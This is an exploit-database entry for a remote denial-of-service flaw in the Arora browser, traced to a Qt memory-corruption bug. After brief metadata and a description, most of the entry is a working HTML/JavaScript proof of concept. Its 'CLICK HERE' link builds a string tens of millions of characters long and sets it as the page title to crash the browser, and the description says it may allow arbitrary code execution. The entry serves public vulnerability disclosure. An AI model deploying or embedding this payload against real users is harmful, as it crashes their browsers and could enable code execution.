Arora browser Remote Denial fo Service

vendor:

Arora browser

by:

Unknown

7.5

CVSS

HIGH

Remote Denial of Service

Unknown

CWE

Product Name: Arora browser

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Arora browser Remote Denial fo Service

This exploit targets the Arora browser and utilizes a remote memory-corruption vulnerability in Qt. By clicking on a link, the attacker can trigger the exploit, leading to the execution of arbitrary code within the application's context. In cases where the exploit fails, a denial-of-service condition will be triggered.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41873/info

Qt is prone to a remote memory-corruption vulnerability.

Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. 

<html>
<head>
<title>Arora browser Remote Denial fo Service </title>
<body bgcolor="black">

<script type="text/javascript">
function garbage() {
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2>==> <a href="javascript:garbage();">CLICK HERE</a></font> <==</h2>
</body>
</html>